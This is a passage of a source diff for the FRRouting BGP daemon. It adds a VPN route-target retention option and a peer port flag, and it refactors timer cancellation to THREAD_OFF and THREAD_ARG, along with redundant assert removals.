@@ -17267,6 +17341,9 @@ static void bgp_config_write_family(struct vty *vty, struct bgp *bgp, afi_t afi,
if (safi == SAFI_FLOWSPEC)
bgp_fs_config_write_pbr(vty, bgp, afi, safi);
+ if (safi == SAFI_MPLS_VPN)
+ bgp_vpn_config_write(vty, bgp, afi, safi);
+
if (safi == SAFI_UNICAST) {
bgp_vpn_policy_config_write_afi(vty, bgp, afi);
if (CHECK_FLAG(bgp->af_flags[afi][safi],
@@ -19251,6 +19328,10 @@ void bgp_vty_init(void)
install_element(BGP_FLOWSPECV6_NODE, &exit_address_family_cmd);
install_element(BGP_EVPN_NODE, &exit_address_family_cmd);
+ /* BGP retain all route-target */
+ install_element(BGP_VPNV4_NODE, &bgp_retain_route_target_cmd);
+ install_element(BGP_VPNV6_NODE, &bgp_retain_route_target_cmd);
+
/* "clear ip bgp commands" */
install_element(ENABLE_NODE, &clear_ip_bgp_all_cmd);
diff --git a/bgpd/bgp_vty.h b/bgpd/bgp_vty.h
index 143d3c1ac5..9526b50fb9 100644
--- a/bgpd/bgp_vty.h
+++ b/bgpd/bgp_vty.h
@@ -28,23 +28,20 @@ struct bgp;
#define BGP_INSTANCE_HELP_STR "BGP view\nBGP VRF\nView/VRF name\n"
#define BGP_INSTANCE_ALL_HELP_STR "BGP view\nBGP VRF\nAll Views/VRFs\n"
+#define BGP_AF_STR "Address Family\n"
+#define BGP_AF_MODIFIER_STR "Address Family modifier\n"
#define BGP_AFI_CMD_STR "<ipv4|ipv6>"
-#define BGP_AFI_HELP_STR "Address Family\nAddress Family\n"
+#define BGP_AFI_HELP_STR BGP_AF_STR BGP_AF_STR
#define BGP_SAFI_CMD_STR "<unicast|multicast|vpn>"
#define BGP_SAFI_HELP_STR \
- "Address Family modifier\n" \
- "Address Family modifier\n" \
- "Address Family modifier\n"
+ BGP_AF_MODIFIER_STR BGP_AF_MODIFIER_STR BGP_AF_MODIFIER_STR
#define BGP_AFI_SAFI_CMD_STR BGP_AFI_CMD_STR" "BGP_SAFI_CMD_STR
#define BGP_AFI_SAFI_HELP_STR BGP_AFI_HELP_STR BGP_SAFI_HELP_STR
#define BGP_SAFI_WITH_LABEL_CMD_STR "<unicast|multicast|vpn|labeled-unicast|flowspec>"
#define BGP_SAFI_WITH_LABEL_HELP_STR \
- "Address Family modifier\n" \
- "Address Family modifier\n" \
- "Address Family modifier\n" \
- "Address Family modifier\n" \
- "Address Family modifier\n"
+ BGP_AF_MODIFIER_STR BGP_AF_MODIFIER_STR BGP_AF_MODIFIER_STR \
+ BGP_AF_MODIFIER_STR BGP_AF_MODIFIER_STR
#define SHOW_GR_HEADER \
"Codes: GR - Graceful Restart," \
@@ -152,6 +149,7 @@ struct bgp;
"endOfRibSentAfterUpdate"); \
} while (0)
+extern void bgp_clear_soft_in(struct bgp *bgp, afi_t afi, safi_t safi);
extern void bgp_vty_init(void);
extern void community_alias_vty(void);
extern const char *get_afi_safi_str(afi_t afi, safi_t safi, bool for_json);
diff --git a/bgpd/bgp_zebra.c b/bgpd/bgp_zebra.c
index fc7590dcc2..2151d0a613 100644
--- a/bgpd/bgp_zebra.c
+++ b/bgpd/bgp_zebra.c
@@ -2687,6 +2687,11 @@ static void bgp_encode_pbr_rule_action(struct stream *s,
else
stream_putl(s, pbra->fwmark); /* fwmark */
+ stream_putl(s, 0); /* queue id */
+ stream_putw(s, 0); /* vlan_id */
+ stream_putw(s, 0); /* vlan_flags */
+ stream_putw(s, 0); /* pcp */
+
stream_putl(s, pbra->table_id);
memset(ifname, 0, sizeof(ifname));
diff --git a/bgpd/bgpd.c b/bgpd/bgpd.c
index 122830343c..bd3e61377a 100644
--- a/bgpd/bgpd.c
+++ b/bgpd/bgpd.c
@@ -2401,12 +2401,12 @@ void peer_nsf_stop(struct peer *peer)
peer->nsf[afi][safi] = 0;
if (peer->t_gr_restart) {
- BGP_TIMER_OFF(peer->t_gr_restart);
+ THREAD_OFF(peer->t_gr_restart);
if (bgp_debug_neighbor_events(peer))
zlog_debug("%pBP graceful restart timer stopped", peer);
}
if (peer->t_gr_stale) {
- BGP_TIMER_OFF(peer->t_gr_stale);
+ THREAD_OFF(peer->t_gr_stale);
if (bgp_debug_neighbor_events(peer))
zlog_debug(
"%pBP graceful restart stalepath timer stopped",
@@ -3240,6 +3240,8 @@ static struct bgp *bgp_create(as_t *as, const char *name,
bgp->vpn_policy[afi].export_vrf = list_new();
bgp->vpn_policy[afi].export_vrf->del =
bgp_vrf_string_name_delete;
+ SET_FLAG(bgp->af_flags[afi][SAFI_MPLS_VPN],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL);
}
if (name)
bgp->name = XSTRDUP(MTYPE_BGP, name);
@@ -3584,7 +3586,7 @@ void bgp_instance_down(struct bgp *bgp)
/* Stop timers. */
if (bgp->t_rmap_def_originate_eval) {
- BGP_TIMER_OFF(bgp->t_rmap_def_originate_eval);
+ THREAD_OFF(bgp->t_rmap_def_originate_eval);
bgp_unlock(bgp); /* TODO - This timer is started with a lock -
why? */
}
@@ -3651,7 +3653,7 @@ int bgp_delete(struct bgp *bgp)
if (!gr_info)
continue;
- BGP_TIMER_OFF(gr_info->t_select_deferral);
+ THREAD_OFF(gr_info->t_select_deferral);
t = gr_info->t_route_select;
if (t) {
@@ -3659,7 +3661,7 @@ int bgp_delete(struct bgp *bgp)
XFREE(MTYPE_TMP, info);
}
- BGP_TIMER_OFF(gr_info->t_route_select);
+ THREAD_OFF(gr_info->t_route_select);
}
if (BGP_DEBUG(zebra, ZEBRA)) {
@@ -3682,7 +3684,7 @@ int bgp_delete(struct bgp *bgp)
/* Stop timers. */
if (bgp->t_rmap_def_originate_eval) {
- BGP_TIMER_OFF(bgp->t_rmap_def_originate_eval);
+ THREAD_OFF(bgp->t_rmap_def_originate_eval);
bgp_unlock(bgp); /* TODO - This timer is started with a lock -
why? */
}
@@ -4261,6 +4263,7 @@ static const struct peer_flag_action peer_flag_action_list[] = {
{PEER_FLAG_EXTENDED_OPT_PARAMS, 0, peer_change_reset},
{PEER_FLAG_ROLE_STRICT_MODE, 0, peer_change_reset},
{PEER_FLAG_ROLE, 0, peer_change_reset},
+ {PEER_FLAG_PORT, 0, peer_change_reset},
{0, 0, 0}};
static const struct peer_flag_action peer_af_flag_action_list[] = {
@@ -4351,7 +4354,7 @@ static void peer_flag_modify_action(struct peer *peer, uint32_t flag)
UNSET_FLAG(peer->sflags, PEER_STATUS_PREFIX_OVERFLOW);
if (peer->t_pmax_restart) {
- BGP_TIMER_OFF(peer->t_pmax_restart);
+ THREAD_OFF(peer->t_pmax_restart);
if (bgp_debug_neighbor_events(peer))
zlog_debug(
"%pBP Maximum-prefix restart timer canceled",
@@ -5448,11 +5451,13 @@ int peer_default_originate_unset(struct peer *peer, afi_t afi, safi_t safi)
void peer_port_set(struct peer *peer, uint16_t port)
{
peer->port = port;
+ peer_flag_set(peer, PEER_FLAG_PORT);
}
void peer_port_unset(struct peer *peer)
{
peer->port = BGP_PORT_DEFAULT;
+ peer_flag_unset(peer, PEER_FLAG_PORT);
}
/* Set the TCP-MSS value in the peer structure,
@@ -7371,7 +7376,7 @@ static bool peer_maximum_prefix_clear_overflow(struct peer *peer)
UNSET_FLAG(peer->sflags, PEER_STATUS_PREFIX_OVERFLOW);
if (peer->t_pmax_restart) {
- BGP_TIMER_OFF(peer->t_pmax_restart);
+ THREAD_OFF(peer->t_pmax_restart);
if (bgp_debug_neighbor_events(peer))
zlog_debug(
"%pBP Maximum-prefix restart timer cancelled",
@@ -8228,20 +8233,22 @@ void bgp_terminate(void)
* of a large number of peers this will ensure that no peer is left with
* a dangling connection
*/
- /* reverse bgp_master_init */
- bgp_close();
-
- if (bm->listen_sockets)
- list_delete(&bm->listen_sockets);
- for (ALL_LIST_ELEMENTS(bm->bgp, mnode, mnnode, bgp))
+ bgp_close();
+ /* reverse bgp_master_init */
+ for (ALL_LIST_ELEMENTS(bm->bgp, mnode, mnnode, bgp)) {
+ bgp_close_vrf_socket(bgp);
for (ALL_LIST_ELEMENTS(bgp->peer, node, nnode, peer))
if (peer_established(peer) || peer->status == OpenSent
|| peer->status == OpenConfirm)
bgp_notify_send(peer, BGP_NOTIFY_CEASE,
BGP_NOTIFY_CEASE_PEER_UNCONFIG);
+ }
+
+ if (bm->listen_sockets)
+ list_delete(&bm->listen_sockets);
- BGP_TIMER_OFF(bm->t_rmap_update);
+ THREAD_OFF(bm->t_rmap_update);
bgp_mac_finish();
}
diff --git a/bgpd/bgpd.h b/bgpd/bgpd.h
index 7f3d240b8e..bcb214873f 100644
--- a/bgpd/bgpd.h
+++ b/bgpd/bgpd.h
@@ -527,6 +527,8 @@ struct bgp {
/* vrf-route leaking flags */
#define BGP_CONFIG_VRF_TO_VRF_IMPORT (1 << 9)
#define BGP_CONFIG_VRF_TO_VRF_EXPORT (1 << 10)
+/* vpnvx retain flag */
+#define BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL (1 << 11)
/* BGP per AF peer count */
uint32_t af_peer_count[AFI_MAX][SAFI_MAX];
@@ -1343,6 +1345,7 @@ struct peer {
#define PEER_FLAG_ROLE_STRICT_MODE (1ULL << 31)
/* `local-role` configured */
#define PEER_FLAG_ROLE (1ULL << 32)
+#define PEER_FLAG_PORT (1ULL << 33)
/*
*GR-Disabled mode means unset PEER_FLAG_GRACEFUL_RESTART
diff --git a/bgpd/rfapi/rfapi.c b/bgpd/rfapi/rfapi.c
index 35a76e7836..382886e0bd 100644
--- a/bgpd/rfapi/rfapi.c
+++ b/bgpd/rfapi/rfapi.c
@@ -721,7 +721,6 @@ void add_vnc_route(struct rfapi_descriptor *rfd, /* cookie, VPN UN addr, peer */
encaptlv = XCALLOC(MTYPE_ENCAP_TLV,
sizeof(struct bgp_attr_encap_subtlv) + 4);
- assert(encaptlv);
encaptlv->type =
BGP_VNC_SUBTLV_TYPE_LIFETIME; /* prefix lifetime */
encaptlv->length = 4;
@@ -766,7 +765,6 @@ void add_vnc_route(struct rfapi_descriptor *rfd, /* cookie, VPN UN addr, peer */
MTYPE_ENCAP_TLV,
sizeof(struct bgp_attr_encap_subtlv) + 2
+ hop->length);
- assert(encaptlv);
encaptlv->type =
BGP_VNC_SUBTLV_TYPE_RFPOPTION; /* RFP
option
@@ -1041,7 +1039,7 @@ void add_vnc_route(struct rfapi_descriptor *rfd, /* cookie, VPN UN addr, peer */
SET_FLAG(new->flags, BGP_PATH_VALID);
/* save backref to rfapi handle */
- assert(bgp_path_info_extra_get(new));
+ bgp_path_info_extra_get(new);
new->extra->vnc.export.rfapi_handle = (void *)rfd;
encode_label(label_val, &new->extra->label[0]);
@@ -1260,7 +1258,7 @@ static int rfapi_open_inner(struct rfapi_descriptor *rfd, struct bgp *bgp,
* since this peer is not on the I/O thread, this lock is not strictly
* necessary, but serves as a reminder to those who may meddle...
*/
- frr_with_mutex(&rfd->peer->io_mtx) {
+ frr_with_mutex (&rfd->peer->io_mtx) {
// we don't need any I/O related facilities
if (rfd->peer->ibuf)
stream_fifo_free(rfd->peer->ibuf);
@@ -1963,7 +1961,6 @@ int rfapi_open(void *rfp_start_val, struct rfapi_ip_addr *vn,
rfd = XCALLOC(MTYPE_RFAPI_DESC,
sizeof(struct rfapi_descriptor));
}
- assert(rfd);
rfd->bgp = bgp;
if (default_options) {
@@ -3081,7 +3078,7 @@ DEFUN (debug_rfapi_register_vn_un,
DEFUN (debug_rfapi_register_vn_un_l2o,
debug_rfapi_register_vn_un_l2o_cmd,
- "debug rfapi-dev register vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> lifetime SECONDS macaddr YY:YY:YY:YY:YY:YY lni (0-16777215)",
+ "debug rfapi-dev register vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> lifetime SECONDS macaddr X:X:X:X:X:X lni (0-16777215)",
DEBUG_STR
DEBUG_RFAPI_STR
"rfapi_register\n"
@@ -3309,7 +3306,7 @@ DEFUN (debug_rfapi_query_vn_un,
DEFUN (debug_rfapi_query_vn_un_l2o,
debug_rfapi_query_vn_un_l2o_cmd,
- "debug rfapi-dev query vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> lni LNI target YY:YY:YY:YY:YY:YY",
+ "debug rfapi-dev query vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> lni LNI target X:X:X:X:X:X",
DEBUG_STR
DEBUG_RFAPI_STR
"rfapi_query\n"
diff --git a/bgpd/rfapi/rfapi_ap.c b/bgpd/rfapi/rfapi_ap.c
index abb18aeb2c..fcc6168cfa 100644
--- a/bgpd/rfapi/rfapi_ap.c
+++ b/bgpd/rfapi/rfapi_ap.c
@@ -459,7 +459,6 @@ int rfapiApAdd(struct bgp *bgp, struct rfapi_descriptor *rfd,
if (rc) {
/* Not found */
adb = XCALLOC(MTYPE_RFAPI_ADB, sizeof(struct rfapi_adb));
- assert(adb);
adb->lifetime = lifetime;
adb->u.key = rk;
diff --git a/bgpd/rfapi/rfapi_encap_tlv.c b/bgpd/rfapi/rfapi_encap_tlv.c
index a7bc909c58..d4e875df2a 100644
--- a/bgpd/rfapi/rfapi_encap_tlv.c
+++ b/bgpd/rfapi/rfapi_encap_tlv.c
@@ -170,7 +170,6 @@ struct rfapi_un_option *rfapi_encap_tlv_to_un_option(struct attr *attr)
stlv = attr->encap_subtlvs;
uo = XCALLOC(MTYPE_RFAPI_UN_OPTION, sizeof(struct rfapi_un_option));
- assert(uo);
uo->type = RFAPI_UN_OPTION_TYPE_TUNNELTYPE;
uo->v.tunnel.type = attr->encap_tunneltype;
tto = &uo->v.tunnel;
diff --git a/bgpd/rfapi/rfapi_import.c b/bgpd/rfapi/rfapi_import.c
index 1d58c03313..1d42702769 100644
--- a/bgpd/rfapi/rfapi_import.c
+++ b/bgpd/rfapi/rfapi_import.c
@@ -856,13 +856,11 @@ static void rfapiBgpInfoChainFree(struct bgp_path_info *bpi)
*/
if (CHECK_FLAG(bpi->flags, BGP_PATH_REMOVED)
&& bpi->extra->vnc.import.timer) {
-
- struct thread **t =
- &(bpi->extra->vnc.import.timer);
- struct rfapi_withdraw *wcb = (*t)->arg;
+ struct rfapi_withdraw *wcb =
+ THREAD_ARG(bpi->extra->vnc.import.timer);
XFREE(MTYPE_RFAPI_WITHDRAW, wcb);
- thread_cancel(t);
+ THREAD_OFF(bpi->extra->vnc.import.timer);
}
next = bpi->next;
@@ -1273,7 +1271,6 @@ rfapiRouteInfo2NextHopEntry(struct rfapi_ip_prefix *rprefix,
#endif
new = XCALLOC(MTYPE_RFAPI_NEXTHOP, sizeof(struct rfapi_next_hop_entry));
- assert(new);
new->prefix = *rprefix;
@@ -1286,7 +1283,6 @@ rfapiRouteInfo2NextHopEntry(struct rfapi_ip_prefix *rprefix,
vo = XCALLOC(MTYPE_RFAPI_VN_OPTION,
sizeof(struct rfapi_vn_option));
- assert(vo);
vo->type = RFAPI_VN_OPTION_TYPE_L2ADDR;
@@ -2308,7 +2304,6 @@ rfapiMonitorEncapAdd(struct rfapi_import_table *import_table,
m = XCALLOC(MTYPE_RFAPI_MONITOR_ENCAP,
sizeof(struct rfapi_monitor_encap));
- assert(m);
m->node = vpn_rn;
m->bpi = vpn_bpi;
@@ -2374,7 +2369,7 @@ static void rfapiMonitorEncapDelete(struct bgp_path_info *vpn_bpi)
*/
static void rfapiWithdrawTimerVPN(struct thread *t)
{
- struct rfapi_withdraw *wcb = t->arg;
+ struct rfapi_withdraw *wcb = THREAD_ARG(t);
struct bgp_path_info *bpi = wcb->info;
struct bgp *bgp = bgp_get_default();
const struct prefix *p;
@@ -2675,7 +2670,7 @@ rfapiWithdrawEncapUpdateCachedUn(struct rfapi_import_table *import_table,
static void rfapiWithdrawTimerEncap(struct thread *t)
{
- struct rfapi_withdraw *wcb = t->arg;
+ struct rfapi_withdraw *wcb = THREAD_ARG(t);
struct bgp_path_info *bpi = wcb->info;
int was_first_route = 0;
struct rfapi_monitor_encap *em;
@@ -2791,7 +2786,6 @@ rfapiBiStartWithdrawTimer(struct rfapi_import_table *import_table,
* service routine, which is supposed to free the wcb.
*/
wcb = XCALLOC(MTYPE_RFAPI_WITHDRAW, sizeof(struct rfapi_withdraw));
- assert(wcb);
wcb->node = rn;
wcb->info = bpi;
wcb->import_table = import_table;
@@ -3093,13 +3087,12 @@ static void rfapiBgpInfoFilteredImportEncap(
*/
if (CHECK_FLAG(bpi->flags, BGP_PATH_REMOVED)
&& bpi->extra->vnc.import.timer) {
-
- struct thread **t =
- &(bpi->extra->vnc.import.timer);
- struct rfapi_withdraw *wcb = (*t)->arg;
+ struct rfapi_withdraw *wcb = THREAD_ARG(
+ bpi->extra->vnc.import.timer);
XFREE(MTYPE_RFAPI_WITHDRAW, wcb);
- thread_cancel(t);
+ THREAD_OFF(
+ bpi->extra->vnc.import.timer);
}
if (action == FIF_ACTION_UPDATE) {
@@ -3186,12 +3179,11 @@ static void rfapiBgpInfoFilteredImportEncap(
"%s: removing holddown bpi matching NVE of new route",
__func__);
if (bpi->extra->vnc.import.timer) {
- struct thread **t =
- &(bpi->extra->vnc.import.timer);
- struct rfapi_withdraw *wcb = (*t)->arg;
+ struct rfapi_withdraw *wcb =
+ THREAD_ARG(bpi->extra->vnc.import.timer);
XFREE(MTYPE_RFAPI_WITHDRAW, wcb);
- thread_cancel(t);
+ THREAD_OFF(bpi->extra->vnc.import.timer);
}
rfapiExpireEncapNow(import_table, rn, bpi);
}
@@ -3224,7 +3216,6 @@ static void rfapiBgpInfoFilteredImportEncap(
struct agg_table *referenced_vpn_table;
referenced_vpn_table = agg_table_init();
- assert(referenced_vpn_table);
/*
* iterate over the set of monitors at this ENCAP node.
@@ -3282,7 +3273,6 @@ static void rfapiBgpInfoFilteredImportEncap(
mnext = XCALLOC(
MTYPE_RFAPI_MONITOR_ENCAP,
sizeof(struct rfapi_monitor_encap));
- assert(mnext);
mnext->node = m->node;
mnext->next = referenced_vpn_prefix->info;
referenced_vpn_prefix->info = mnext;
@@ -3549,13 +3539,12 @@ void rfapiBgpInfoFilteredImportVPN(
*/
if (CHECK_FLAG(bpi->flags, BGP_PATH_REMOVED)
&& bpi->extra->vnc.import.timer) {
-
- struct thread **t =
- &(bpi->extra->vnc.import.timer);
- struct rfapi_withdraw *wcb = (*t)->arg;
+ struct rfapi_withdraw *wcb = THREAD_ARG(
+ bpi->extra->vnc.import.timer);
XFREE(MTYPE_RFAPI_WITHDRAW, wcb);
- thread_cancel(t);
+ THREAD_OFF(
+ bpi->extra->vnc.import.timer);
import_table->holddown_count[afi] -= 1;
RFAPI_UPDATE_ITABLE_COUNT(
@@ -3768,12 +3757,11 @@ void rfapiBgpInfoFilteredImportVPN(
"%s: removing holddown bpi matching NVE of new route",
__func__);
if (bpi->extra->vnc.import.timer) {
- struct thread **t =
- &(bpi->extra->vnc.import.timer);
- struct rfapi_withdraw *wcb = (*t)->arg;
+ struct rfapi_withdraw *wcb =
+ THREAD_ARG(bpi->extra->vnc.import.timer);
XFREE(MTYPE_RFAPI_WITHDRAW, wcb);
- thread_cancel(t);
+ THREAD_OFF(bpi->extra->vnc.import.timer);
}
rfapiExpireVpnNow(import_table, rn, bpi, 0);
}
@@ -4332,7 +4320,6 @@ rfapiImportTableRefAdd(struct bgp *bgp, struct ecommunity *rt_import_list,
if (!it) {
it = XCALLOC(MTYPE_RFAPI_IMPORTTABLE,
sizeof(struct rfapi_import_table));
- assert(it);
it->next = h->imports;
h->imports = it;
@@ -4497,12 +4484,11 @@ static void rfapiDeleteRemotePrefixesIt(
if (!delete_holddown)
continue;
if (bpi->extra->vnc.import.timer) {
-
- struct thread **t =
- &(bpi->extra->vnc
- .import.timer);
struct rfapi_withdraw *wcb =
- (*t)->arg;
+ THREAD_ARG(
+ bpi->extra->vnc
+ .import
+ .timer);
wcb->import_table
->holddown_count[afi] -=
@@ -4512,7 +4498,9 @@ static void rfapiDeleteRemotePrefixesIt(
afi, 1);
XFREE(MTYPE_RFAPI_WITHDRAW,
wcb);
- thread_cancel(t);
+ THREAD_OFF(
+ bpi->extra->vnc.import
+ .timer);
}
} else {
if (!delete_active)
@@ -4551,7 +4539,6 @@ static void rfapiDeleteRemotePrefixesIt(
MTYPE_RFAPI_NVE_ADDR,
sizeof(struct
rfapi_nve_addr));
- assert(nap);
*nap = na;
nap->info = is_active
? pAHcount
diff --git a/bgpd/rfapi/rfapi_monitor.c b/bgpd/rfapi/rfapi_monitor.c
index 58a0f8dea7..0e71d5d7e1 100644
--- a/bgpd/rfapi/rfapi_monitor.c
+++ b/bgpd/rfapi/rfapi_monitor.c
@@ -620,7 +620,7 @@ void rfapiMonitorDel(struct bgp *bgp, struct rfapi_descriptor *rfd,
rfapiMonitorDetachImport(m);
}
- thread_cancel(&m->timer);
+ THREAD_OFF(m->timer);
/*
* remove from rfd list
@@ -657,7 +657,7 @@ int rfapiMonitorDelHd(struct rfapi_descriptor *rfd)
rfapiMonitorDetachImport(m);
}
- thread_cancel(&m->timer);
+ THREAD_OFF(m->timer);
XFREE(MTYPE_RFAPI_MONITOR, m);
rn->info = NULL;
@@ -691,7 +691,7 @@ int rfapiMonitorDelHd(struct rfapi_descriptor *rfd)
#endif
}
- thread_cancel(&mon_eth->timer);
+ THREAD_OFF(mon_eth->timer);
/*
* remove from rfd list
@@ -733,7 +733,7 @@ void rfapiMonitorResponseRemovalOn(struct bgp *bgp)
static void rfapiMonitorTimerExpire(struct thread *t)
{
- struct rfapi_monitor_vpn *m = t->arg;
+ struct rfapi_monitor_vpn *m = THREAD_ARG(t);
/* forget reference to thread, it's gone */
m->timer = NULL;
@@ -744,19 +744,17 @@ static void rfapiMonitorTimerExpire(struct thread *t)
static void rfapiMonitorTimerRestart(struct rfapi_monitor_vpn *m)
{
- if (m->timer) {
- unsigned long remain = thread_timer_remain_second(m->timer);
+ unsigned long remain = thread_timer_remain_second(m->timer);
- /* unexpected case, but avoid wraparound problems below */
- if (remain > m->rfd->response_lifetime)
- return;
+ /* unexpected case, but avoid wraparound problems below */
+ if (remain > m->rfd->response_lifetime)
+ return;
- /* don't restart if we just restarted recently */
- if (m->rfd->response_lifetime - remain < 2)
- return;
+ /* don't restart if we just restarted recently */
+ if (m->rfd->response_lifetime - remain < 2)
+ return;
- thread_cancel(&m->timer);
- }
+ THREAD_OFF(m->timer);
{
char buf[BUFSIZ];
@@ -766,7 +764,7 @@ static void rfapiMonitorTimerRestart(struct rfapi_monitor_vpn *m)
rfapi_ntop(m->p.family, m->p.u.val, buf, BUFSIZ),
m->rfd->response_lifetime);
}
- m->timer = NULL;
+
thread_add_timer(bm->master, rfapiMonitorTimerExpire, m,
m->rfd->response_lifetime, &m->timer);
}
@@ -1041,7 +1039,7 @@ void rfapiMonitorMovedUp(struct rfapi_import_table *import_table,
static void rfapiMonitorEthTimerExpire(struct thread *t)
{
- struct rfapi_monitor_eth *m = t->arg;
+ struct rfapi_monitor_eth *m = THREAD_ARG(t);
/* forget reference to thread, it's gone */
m->timer = NULL;
@@ -1054,19 +1052,17 @@ static void rfapiMonitorEthTimerExpire(struct thread *t)
static void rfapiMonitorEthTimerRestart(struct rfapi_monitor_eth *m)
{
- if (m->timer) {
- unsigned long remain = thread_timer_remain_second(m->timer);
+ unsigned long remain = thread_timer_remain_second(m->timer);
- /* unexpected case, but avoid wraparound problems below */
- if (remain > m->rfd->response_lifetime)
- return;
+ /* unexpected case, but avoid wraparound problems below */
+ if (remain > m->rfd->response_lifetime)
+ return;
- /* don't restart if we just restarted recently */
- if (m->rfd->response_lifetime - remain < 2)
- return;
+ /* don't restart if we just restarted recently */
+ if (m->rfd->response_lifetime - remain < 2)
+ return;
- thread_cancel(&m->timer);
- }
+ THREAD_OFF(m->timer);
{
char buf[BUFSIZ];
@@ -1076,7 +1072,7 @@ static void rfapiMonitorEthTimerRestart(struct rfapi_monitor_eth *m)
rfapiEthAddr2Str(&m->macaddr, buf, BUFSIZ),
m->rfd->response_lifetime);
}
- m->timer = NULL;
+
thread_add_timer(bm->master, rfapiMonitorEthTimerExpire, m,
m->rfd->response_lifetime, &m->timer);
}
@@ -1404,7 +1400,7 @@ void rfapiMonitorEthDel(struct bgp *bgp, struct rfapi_descriptor *rfd,
rfapiMonitorEthDetachImport(bgp, val);
}
- thread_cancel(&val->timer);
+ THREAD_OFF(val->timer);
/*
* remove from rfd list
diff --git a/bgpd/rfapi/rfapi_rib.c b/bgpd/rfapi/rfapi_rib.c
index 44eebe961c..9d61ada7db 100644
--- a/bgpd/rfapi/rfapi_rib.c
+++ b/bgpd/rfapi/rfapi_rib.c
@@ -268,8 +268,8 @@ static void rfapi_info_free(struct rfapi_info *goner)
if (goner->timer) {
struct rfapi_rib_tcb *tcb;
- tcb = goner->timer->arg;
- thread_cancel(&goner->timer);
+ tcb = THREAD_ARG(goner->timer);
+ THREAD_OFF(goner->timer);
XFREE(MTYPE_RFAPI_RECENT_DELETE, tcb);
}
XFREE(MTYPE_RFAPI_INFO, goner);
@@ -293,7 +293,7 @@ struct rfapi_rib_tcb {
*/
static void rfapiRibExpireTimer(struct thread *t)
{
- struct rfapi_rib_tcb *tcb = t->arg;
+ struct rfapi_rib_tcb *tcb = THREAD_ARG(t);
RFAPI_RIB_CHECK_COUNTS(1, 0);
@@ -338,8 +338,8 @@ static void rfapiRibStartTimer(struct rfapi_descriptor *rfd,
struct rfapi_rib_tcb *tcb = NULL;
if (ri->timer) {
- tcb = ri->timer->arg;
- thread_cancel(&ri->timer);
+ tcb = THREAD_ARG(ri->timer);
+ THREAD_OFF(ri->timer);
} else {
tcb = XCALLOC(MTYPE_RFAPI_RECENT_DELETE,
sizeof(struct rfapi_rib_tcb));
@@ -357,10 +357,9 @@ static void rfapiRibStartTimer(struct rfapi_descriptor *rfd,
vnc_zlog_debug_verbose("%s: rfd %p pfx %pRN life %u", __func__, rfd, rn,
ri->lifetime);
- ri->timer = NULL;
+
thread_add_timer(bm->master, rfapiRibExpireTimer, tcb, ri->lifetime,
&ri->timer);
- assert(ri->timer);
}
extern void rfapi_rib_key_init(struct prefix *prefix, /* may be NULL */
@@ -914,8 +913,8 @@ static void process_pending_node(struct bgp *bgp, struct rfapi_descriptor *rfd,
if (ri->timer) {
struct rfapi_rib_tcb *tcb;
- tcb = ri->timer->arg;
- thread_cancel(&ri->timer);
+ tcb = THREAD_ARG(ri->timer);
+ THREAD_OFF(ri->timer);
XFREE(MTYPE_RFAPI_RECENT_DELETE, tcb);
}
@@ -999,8 +998,8 @@ static void process_pending_node(struct bgp *bgp, struct rfapi_descriptor *rfd,
if (ori->timer) {
struct rfapi_rib_tcb *tcb;
- tcb = ori->timer->arg;
- thread_cancel(&ori->timer);
+ tcb = THREAD_ARG(ori->timer);
+ THREAD_OFF(ori->timer);
XFREE(MTYPE_RFAPI_RECENT_DELETE, tcb);
}
@@ -1179,7 +1178,6 @@ callback:
new = XCALLOC(MTYPE_RFAPI_NEXTHOP,
sizeof(struct rfapi_next_hop_entry));
- assert(new);
if (ri->rk.aux_prefix.family) {
rfapiQprefix2Rprefix(&ri->rk.aux_prefix,
@@ -1269,7 +1267,6 @@ callback:
new = XCALLOC(
MTYPE_RFAPI_NEXTHOP,
sizeof(struct rfapi_next_hop_entry));
- assert(new);
if (ri->rk.aux_prefix.family) {
rfapiQprefix2Rprefix(&ri->rk.aux_prefix,
@@ -1345,8 +1342,8 @@ callback:
if (ri->timer) {
struct rfapi_rib_tcb *tcb;
- tcb = ri->timer->arg;
- thread_cancel(&ri->timer);
+ tcb = THREAD_ARG(ri->timer);
+ THREAD_OFF(ri->timer);
XFREE(MTYPE_RFAPI_RECENT_DELETE, tcb);
}
RFAPI_RIB_CHECK_COUNTS(0, delete_list->count);
@@ -1718,7 +1715,6 @@ void rfapiRibUpdatePendingNode(
urq = XCALLOC(MTYPE_RFAPI_UPDATED_RESPONSE_QUEUE,
sizeof(struct rfapi_updated_responses_queue));
- assert(urq);
if (!rfd->updated_responses_queue)
updated_responses_queue_init(rfd);
diff --git a/bgpd/rfapi/rfapi_vty.c b/bgpd/rfapi/rfapi_vty.c
index b95bace0d1..c8fdadcac9 100644
--- a/bgpd/rfapi/rfapi_vty.c
+++ b/bgpd/rfapi/rfapi_vty.c
@@ -928,12 +928,9 @@ int rfapiShowVncQueries(void *stream, struct prefix *pfx_match)
} else
fp(out, "%-15s %-15s", "", "");
buf_remain[0] = 0;
- if (m->timer) {
- rfapiFormatSeconds(
- thread_timer_remain_second(
- m->timer),
- buf_remain, BUFSIZ);
- }
+ rfapiFormatSeconds(
+ thread_timer_remain_second(m->timer),
+ buf_remain, BUFSIZ);
fp(out, " %-15s %-10s\n",
inet_ntop(m->p.family, &m->p.u.prefix,
buf_pfx, BUFSIZ),
@@ -1005,12 +1002,9 @@ int rfapiShowVncQueries(void *stream, struct prefix *pfx_match)
} else
fp(out, "%-15s %-15s", "", "");
buf_remain[0] = 0;
- if (mon_eth->timer) {
- rfapiFormatSeconds(
- thread_timer_remain_second(
- mon_eth->timer),
- buf_remain, BUFSIZ);
- }
+ rfapiFormatSeconds(thread_timer_remain_second(
+ mon_eth->timer),
+ buf_remain, BUFSIZ);
fp(out, " %-17s %10d %-10s\n",
rfapi_ntop(pfx_mac.family, &pfx_mac.u.prefix,
buf_pfx, BUFSIZ),
@@ -2515,7 +2509,7 @@ DEFUN (add_vnc_prefix,
************************************************************************/
DEFUN (add_vnc_mac_vni_prefix_cost_life,
add_vnc_mac_vni_prefix_cost_life_cmd,
